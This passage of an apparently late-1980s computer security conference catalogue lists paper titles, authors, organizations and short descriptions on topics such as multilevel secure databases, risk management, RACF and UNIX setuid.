CATEGORY: Data Base Management
ORGANIZATION: TRW Federal Systems Group
2751 Prosperity Avenue
P.O. Box 10440
Fairfax, VA 22031
DESCRIPTION: This paper presents the Sybase Secure
Dataserver (SYSDS) approach to solving the problem
of a cost-effective, reliable multilevel secure
Database Management System (DBMS) without loosing
essential performance characteristics.
GENERAL SECURITY
AUTHOR: Taylor, Phillip H.

TITLE: The National Computer Security Center
Technical Guidelines Program
CATEGORY: General Security
ORGANIZATION: National Computer Security Center
9800 Savage Road
Ft. George G. Meade, MD 20755-6000
(301) 859-4452
DESCRIPTION: The purpose of this paper is to
provide a national computer security literature
base that distributes computer security knowledge
and techniques, instills an accepted computer
security terminology, and applies research to
practical problems of computer security.

 

PHYSICAL SECURITY & HARDWARE
AUTHOR: Saydjari, Sami O., Beckman, Joseph M. and
Leaman, Jeffrey R.
TITLE: Locking Computers Securely

CATEGORY: Physical Security & Hardware
ORGANIZATION: Office of Research and Development
National Computer Security Center
9800 Savage Road
Ft. George G. Meade, MD 20755-6000
DESCRIPTION: This paper describes the Logical
Coprocessing Kernal (LOCK) project and the need for
secure computing in both defense and industry.
PRIVACY
AUTHOR: Campbell, Marlene Dr.

TITLE: Security and Privacy: Issues of
Issues of Professional Ethics

CATEGORY: Privacy
ORGANIZATION: Murray State University
Murray, Kentucky 42071

DESCRIPTION: The purpose of this paper is to
provide academicians with both motivation and ideas
for bringing ethics formulation into the computer
information systems classroom.
AUTHOR: Denning, Dorothy E., Newmann, Peter G. and
Parker, Donn B.
TITLE: Social Aspects of Computer Security

CATEGORY: Privacy
ORGANIZATION: SRI International
333 Ravenswood Avenue
Menlo Park, CA 94025
DESCRIPTION: This papers objective is to examine
social aspects of computer security, particularly
with respect to some of the technologies being
developed.

RISK MANAGEMENT
AUTHOR: Moses, Robin H. and Clark, Rodney

TITLE: Risk Analysis and Management in Practice
for the UK Government The CCTA Risk
Analysis and Management Methodology: CRAMM

CATEGORY: Risk Management
ORGANIZATION: UK Central Computer and
Telecommunications Agency (CCTA)
Riverwalk House, 157-161 Millbank,
London, SW1P 9PN, England
DESCRIPTION: This paper discusses a risk analysis
and management methodology for Information
Technology (IT) Security developed by the UK
Government.

AUTHOR: Pinsky, Sylvan Dr.

TITLE: A Panel Discussion on Risk Management: A
Plan for the Future

CATEGORY: Risk Management
ORGANIZATION: Office of Research and Development
National Computer Security Center
9800 Savage Road
Ft. George G. Meade, MD 20755-6000
DESCRIPTION: This paper addresses a panel
discussion on the major issues of risk management
and the steps necessary to resolve the commonly
known problems.

 

SECURITY MANAGEMENT
AUTHOR: Arsenault, Alfred W.

TITLE: Advisory Memorandum on Office Automation
Security: An Overview

CATEGORY: Security Management
ORGANIZATION: National Computer Security Center
9800 Savage Road
Ft. George G. Meade, MD 20755-6000
(301) 859-4452
DESCRIPTION: This paper presents an overview of
National Telecommunications and Automated
Information Systems Security Advisory Memorandum
on Office Automation Security, which was issued
by COMPUSEC January 1987.

AUTHOR: Brown, Leonard R.

TITLE: Specification for a Canonical Configuration
Accounting Tool

CATEGORY: Security Management
ORGANIZATION: Computer Security Office, M1/055
The Aerospace Corporation
P.O. Box 92957
Los Angeles, CA 90009
DESCRIPTION: This paper describes the TCCS system
that has been designed as an aid in evaluation of
configuration accounting systems for use in
development of a secure system.

AUTHOR: Maria, Arturo PhD

TITLE: RACF Implementation at Puget Power

CATEGORY: Security Management
ORGANIZATION: Information Systems Consultant
DESCRIPTION: This document describes the approach
taken at Puget Sound Power and Light Company to
implement IBM’s Resource Access Control Facility.

AUTHOR: Neugent, William

TITLE: Management Actions for Improving DoD
Computer Security
CATEGORY: Security Management
ORGANIZATION: The MITRE Corporation
HQ USAREUR, ODCSOPS
APO New York 09063
Tel. 011-49-6221-372710
DESCRIPTION: This paper focusses on the current
computer security practice in the field of the
Department of Defense computer security activities.

 

SOFTWARE & OPERATING SYSTEM SECURITY
AUTHOR: Addison, Katherine, Baron, Larry
Copple, Mark, Cragun, Don and
Hospers, Keith
TITLE: Computer Security at Sun Microsystems, Inc.

CATEGORY: Software & Operating System Security
ORGANIZATION: Sun Microsystems, Inc.
Mountain View, CA
DESCRIPTION: This paper describes the “Secure Sun
OS) product history, status, and goals. This paper
also describes some of Sun’s future directions in
the secure systems marketplace.

AUTHOR: Bunch, Steve

TITLE: The Setuid Feature in UNIX and Security

CATEGORY: Software & Operating System Security
ORGANIZATION: Gould Computer Systems Divisions
1101 E. University
Urbana, Ill. 61801
(217) 384-8515
DESCRIPTION: This paper defines some impo